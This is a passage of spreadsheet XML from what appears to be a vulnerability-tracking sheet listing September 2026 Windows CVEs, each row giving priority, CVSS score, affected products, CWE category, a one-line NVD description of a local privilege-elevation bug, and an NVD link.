          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P127" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q127" s="5" t="inlineStr"/>
      <c r="R127" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S127" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Print Spooler Components allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T127" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68848</t>
        </is>
      </c>
    </row>
    <row r="128">
      <c r="A128" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B128" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C128" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68875</t>
        </is>
      </c>
      <c r="D128" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E128" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F128" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G128" s="5" t="inlineStr"/>
      <c r="H128" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I128" s="5" t="inlineStr"/>
      <c r="J128" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K12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8" s="5" t="inlineStr"/>
      <c r="M128" s="5" t="inlineStr"/>
      <c r="N128" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O128" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P128" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="Q128" s="5" t="inlineStr"/>
      <c r="R128" s="5" t="inlineStr">
        <is>
          <t>CWE-126</t>
        </is>
      </c>
      <c r="S128" s="5" t="inlineStr">
        <is>
          <t>Buffer over-read in Windows NTFS allows an authorized attacker to execute code locally.</t>
        </is>
      </c>
      <c r="T128" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68875</t>
        </is>
      </c>
    </row>
    <row r="129">
      <c r="A129" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B129" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C129" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69265</t>
        </is>
      </c>
      <c r="D129" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E129" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F129" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G129" s="5" t="inlineStr"/>
      <c r="H129" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I129" s="5" t="inlineStr"/>
      <c r="J129" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K1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29" s="5" t="inlineStr"/>
      <c r="M129" s="5" t="inlineStr"/>
      <c r="N129" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O129" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P129" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="Q129" s="5" t="inlineStr"/>
      <c r="R129" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="S129" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows NTFS allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T129" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69265</t>
        </is>
      </c>
    </row>
    <row r="130">
      <c r="A130" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B130" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C130" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69270</t>
        </is>
      </c>
      <c r="D130" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E130" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F130" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G130" s="5" t="inlineStr"/>
      <c r="H130" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I130" s="5" t="inlineStr"/>
      <c r="J130" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K1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0" s="5" t="inlineStr"/>
      <c r="M130" s="5" t="inlineStr"/>
      <c r="N130" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O130" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P130" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q130" s="5" t="inlineStr"/>
      <c r="R130" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-20</t>
        </is>
      </c>
      <c r="S130" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows USB Audio Class driver (usbaudio.sys) allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T130" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69270</t>
        </is>
      </c>
    </row>
    <row r="131">
      <c r="A131" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B131" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C131" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69293</t>
        </is>
      </c>
      <c r="D131" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E131" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F131" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G131" s="5" t="inlineStr"/>
      <c r="H131" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I131" s="5" t="inlineStr"/>
      <c r="J131" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K13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31" s="5" t="inlineStr"/>
      <c r="M131" s="5" t="inlineStr"/>
      <c r="N131" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O131" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P131" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="Q131" s="5" t="inlineStr"/>
      <c r="R131" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-20</t>
        </is>
      </c>
      <c r="S131" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T131" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69293</t>
        </is>
      </c>
    </row>
    <row r="132">
      <c r="A132" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B132" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C132" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69295</t>
        </is>
      </c>
      <c r="D132" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E132" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F132" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G132" s="5" t="inlineStr"/>
      <c r="H132" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I132" s="5" t="inlineStr"/>
      <c r="J132" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K1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2" s="5" t="inlineStr"/>
      <c r="M132" s="5" t="inlineStr"/>
      <c r="N132" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O132" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P132" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q132" s="5" t="inlineStr"/>
      <c r="R132" s="5" t="inlineStr">
        <is>
          <t>CWE-125, CWE-20</t>
        </is>
      </c>
      <c r="S132" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows USB Driver allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T132" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69295</t>
        </is>
      </c>
    </row>
    <row r="133">
      <c r="A133" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B133" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C133" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69298</t>
        </is>
      </c>
      <c r="D133" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E133" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F133" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G133" s="5" t="inlineStr"/>
      <c r="H133" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I133" s="5" t="inlineStr"/>
      <c r="J133" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K13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33" s="5" t="inlineStr"/>
      <c r="M133" s="5" t="inlineStr"/>
      <c r="N133" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O133" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P133" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q133" s="5" t="inlineStr"/>
      <c r="R133" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="S133" s="5" t="inlineStr">
        <is>
          <t>Integer overflow or wraparound in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T133" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69298</t>
        </is>
      </c>
    </row>
    <row r="134">
      <c r="A134" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B134" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C134" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69307</t>
        </is>
      </c>
      <c r="D134" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E134" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F134" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G134" s="5" t="inlineStr"/>
      <c r="H134" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I134" s="5" t="inlineStr"/>
      <c r="J134" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K13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4" s="5" t="inlineStr"/>
      <c r="M134" s="5" t="inlineStr"/>
      <c r="N134" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O134" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P134" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q134" s="5" t="inlineStr"/>
      <c r="R134" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S134" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows USB Audio Class driver (usbaudio.sys) allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T134" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69307</t>
        </is>
      </c>
    </row>
    <row r="135">
      <c r="A135" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B135" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C135" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69312</t>
        </is>
      </c>
      <c r="D135" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E135" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F135" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G135" s="5" t="inlineStr"/>
      <c r="H135" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I135" s="5" t="inlineStr"/>
      <c r="J135" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K1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5" s="5" t="inlineStr"/>
      <c r="M135" s="5" t="inlineStr"/>
      <c r="N135" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O135" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P135" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="Q135" s="5" t="inlineStr"/>
      <c r="R135" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="S135" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows NTFS allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T135" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69312</t>
        </is>
      </c>
    </row>
    <row r="136">
      <c r="A136" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B136" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C136" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69323</t>
        </is>
      </c>
      <c r="D136" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E136" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F136" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G136" s="5" t="inlineStr"/>
      <c r="H136" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I136" s="5" t="inlineStr"/>
      <c r="J136" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K13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36" s="5" t="inlineStr"/>
      <c r="M136" s="5" t="inlineStr"/>
      <c r="N136" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O136" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P136" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q136" s="5" t="inlineStr"/>
      <c r="R136" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S136" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T136" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69323</t>
        </is>
      </c>
    </row>
    <row r="137">
      <c r="A137" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B137" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C137" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69348</t>
        </is>
      </c>
      <c r="D137" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E137" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F137" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G137" s="5" t="inlineStr"/>
      <c r="H137" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I137" s="5" t="inlineStr"/>
      <c r="J137" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K137" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L137" s="5" t="inlineStr"/>
      <c r="M137" s="5" t="inlineStr"/>
      <c r="N137" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O137" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P137" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q137" s="5" t="inlineStr"/>
      <c r="R137" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S137" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Win32K allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T137" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69348</t>
        </is>
      </c>
    </row>
    <row r="138">
      <c r="A138" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B138" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C138" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69352</t>
        </is>
      </c>
      <c r="D138" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E138" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F138" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G138" s="5" t="inlineStr"/>
      <c r="H138" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I138" s="5" t="inlineStr"/>
      <c r="J138" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K13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38" s="5" t="inlineStr"/>
      <c r="M138" s="5" t="inlineStr"/>
      <c r="N138" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O138" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P138" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="Q138" s="5" t="inlineStr"/>
      <c r="R138" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-20</t>
        </is>
      </c>
      <c r="S138" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T138" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69352</t>
        </is>
      </c>
    </row>
    <row r="139">
      <c r="A139" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B139" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C139" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69421</t>
        </is>
      </c>
      <c r="D139" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E139" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F139" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G139" s="5" t="inlineStr"/>
      <c r="H139" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I139" s="5" t="inlineStr"/>
      <c r="J139" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K13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39" s="5" t="inlineStr"/>
      <c r="M139" s="5" t="inlineStr"/>
      <c r="N139" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O139" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P139" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="Q139" s="5" t="inlineStr"/>
      <c r="R139" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-191</t>
        </is>
      </c>
      <c r="S139" s="5" t="inlineStr">
        <is>
          <t>Integer underflow (wrap or wraparound) in Windows Kernel Mode Driver allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T139" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69421</t>
        </is>
      </c>
    </row>
    <row r="140">
      <c r="A140" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B140" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C140" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69475</t>
        </is>
      </c>
      <c r="D140" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E140" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F140" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G140" s="5" t="inlineStr"/>
      <c r="H140" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I140" s="5" t="inlineStr"/>
      <c r="J140" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K1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40" s="5" t="inlineStr"/>
      <c r="M140" s="5" t="inlineStr"/>
      <c r="N140" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O140" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P140" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="Q140" s="5" t="inlineStr"/>
      <c r="R140" s="5" t="inlineStr">
        <is>
          <t>CWE-822</t>
        </is>
      </c>
      <c r="S140" s="5" t="inlineStr">
        <is>
          <t>Untrusted pointer dereference in Windows Remote Desktop Services allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T140" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69475</t>
        </is>
      </c>
    </row>
    <row r="141">
      <c r="A141" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B141" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C141" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69476</t>
        </is>
      </c>
      <c r="D141" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E141" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F141" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G141" s="5" t="inlineStr"/>
      <c r="H141" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I141" s="5" t="inlineStr"/>
      <c r="J141" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K14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1" s="5" t="inlineStr"/>
      <c r="M141" s="5" t="inlineStr"/>
      <c r="N141" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O141" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P141" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="Q141" s="5" t="inlineStr"/>
      <c r="R141" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S141" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T141" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69476</t>
        </is>
      </c>
    </row>
    <row r="142">
      <c r="A142" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B142" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C142" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69489</t>
        </is>
      </c>
      <c r="D142" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E142" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F142" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G142" s="5" t="inlineStr"/>
      <c r="H142" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I142" s="5" t="inlineStr"/>
      <c r="J142" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K14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2" s="5" t="inlineStr"/>
      <c r="M142" s="5" t="inlineStr"/>
      <c r="N142" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O142" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P142" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="Q142" s="5" t="inlineStr"/>
      <c r="R142" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S142" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T142" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69489</t>
        </is>
      </c>
    </row>
    <row r="143">
      <c r="A143" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B143" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C143" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69532</t>
        </is>
      </c>
      <c r="D143" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E143" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F143" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G143" s="5" t="inlineStr"/>
      <c r="H143" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I143" s="5" t="inlineStr"/>
      <c r="J143" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K1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43" s="5" t="inlineStr"/>
      <c r="M143" s="5" t="inlineStr"/>
      <c r="N143" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O143" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P143" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="Q143" s="5" t="inlineStr"/>
      <c r="R143" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="S143" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows NTFS allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T143" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69532</t>
        </is>
      </c>
    </row>
    <row r="144">
      <c r="A144" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B144" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C144" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69571</t>
        </is>
      </c>
      <c r="D144" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E144" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F144" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G144" s="5" t="inlineStr"/>
      <c r="H144" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I144" s="5" t="inlineStr"/>
      <c r="J144" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K1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44" s="5" t="inlineStr"/>
      <c r="M144" s="5" t="inlineStr"/>
      <c r="N144" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O144" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P144" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q144" s="5" t="inlineStr"/>
      <c r="R144" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S144" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows USB Audio Class driver (usbaudio.sys) allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T144" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69571</t>
        </is>
      </c>
    </row>
    <row r="145">
      <c r="A145" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
